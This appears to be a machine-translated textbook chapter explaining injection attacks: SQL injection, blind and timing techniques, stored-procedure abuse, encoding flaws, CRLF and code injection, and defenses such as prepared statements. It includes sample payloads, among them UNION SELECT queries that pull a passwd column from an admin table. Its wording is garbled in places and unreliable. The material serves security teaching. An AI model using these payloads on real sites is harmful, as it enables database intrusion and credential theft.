Chapter 7 injection attacks
Essence injection attacks is that the data entered by the user as code execution. There are two key conditions: First, the user is able to control input; the second is the code of the original program to be executed, stitching the data entered by the user.
1, SQL injection
SQL injection is inserted into a Web form submitted by the SQL command or enter a domain name or page request query string, and ultimately deceive server to execute malicious SQL commands. SQL injection attacks are a relatively common vulnerability attacks against the database. In the process of SQL injection, if the site's Web server is turned the wrong echo, significant error back sensitive information disclosure, for an attacker to construct SQL injection provides a great convenience.
2, blind (Blind Injection)
Blinds, injection attack is done when the server is not wrong echo. No echo server error, for an attacker missing a very important "debugging information", so the attacker must find a way to verify that the injected SQL statements executed.
The most common blind verification method is simple structure conditional statements, based on the return page is changed, to determine whether to execute SQL statements.
Column such as: id = 2 and 1 = 2, the attacker can see the results page will be blank or an error page. When the input id = 2 and 1 = 1, if the page is returned to normal, indicating successful execution of SQL statements and can determine the existence of SQL vulnerabilities id parameter.
3、Timing Attack
MYSQL utilized BENCHMARK () function, so that the same function can be performed several times, so that the returned result longer than usual; by changes in the length of time, can determine whether the statement is executed successfully implanted. This is a side-channel attack, the attack is called the Timing Attack blinds. In different databases, there are similar BENCHMARK () function, may be utilized Timing Attak.
4, database attack technique
SQL injection can guess the corresponding version of the database, in the following passage payLoad if Mysql version is 4, it will return TURE.
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
Below this payload, use union select admin respectively confirmed the existence of the table name, column name passwd exists.
id=5 union all select 1,2,3 from admin
id=5 union all select 1,2,passwd from admin
sqlmap.py is a very good automated injection tool.
5, command execution
In MYSQL in addition command may be performed indirectly by deriving webshell, the technique can also use "user defined function", i.e., UDF (User-Defined Function) in executing the command.
6, stored procedures attack
The stored procedure must be performed using the CALL or EXECUTE.
xp_cmdshell: order execution system (enabled by default in SQL Server2000 in 2005 and later were disabled by default)
xp_regread: you can operate the registry.
xp_servicecontrol: allows users to start, stop service
xp_dirtree: allows to obtain a directory tree
xp_loginconfig: Get the server information security
The stored procedure itself may also be present injection vulnerability.
7, coding problems
When the database using the "wide characters" may not have some intention of vulnerability. For example, when using a MYSQL when GBK coding, oxbf27 and oxbf5c will be considered a character (double-byte characters).
The best unified database character set to UTF-8.
8, the right of defense against SQL injection
- Find all SQL injection vulnerabilities;
- Repair these vulnerabilities.
In general, the best way to defense SQL injection, that is, using a prepared statement, bind variables.
Using stored procedures: SQL statements defined in the database, try to avoid using dynamic SQL statement in a stored procedure. If unavoidable, strict input filter should be used or encoding function to process user input data.
Check the data type
The use of safety functions
9, other injection attacks
XML injection: Xml injection is achieved by rewriting the data content xml.
Code injection: often caused by a number of methods or functions unsafe. The eval (), PHP, JSP dynamic include (), system ().
CRLF injection: carriage return (CR, ASCII13, \ r) line feed (LF, ASCII10, \ n).
\ R \ n two characters for a newline. Hexadecimal encoding are 0x0d, 0x0a.
The method against CRLF is very simple, just deal with the "\ r", "\ n" These two characters can be reserved.
10 Summary
Injection attacks is contrary to the results of the application "data and code principle of separation" caused.
In the fight against injection attack, just keep in mind "the principle of separation of data and code," security checks in place a patchwork occur, will be able to avoid such problems.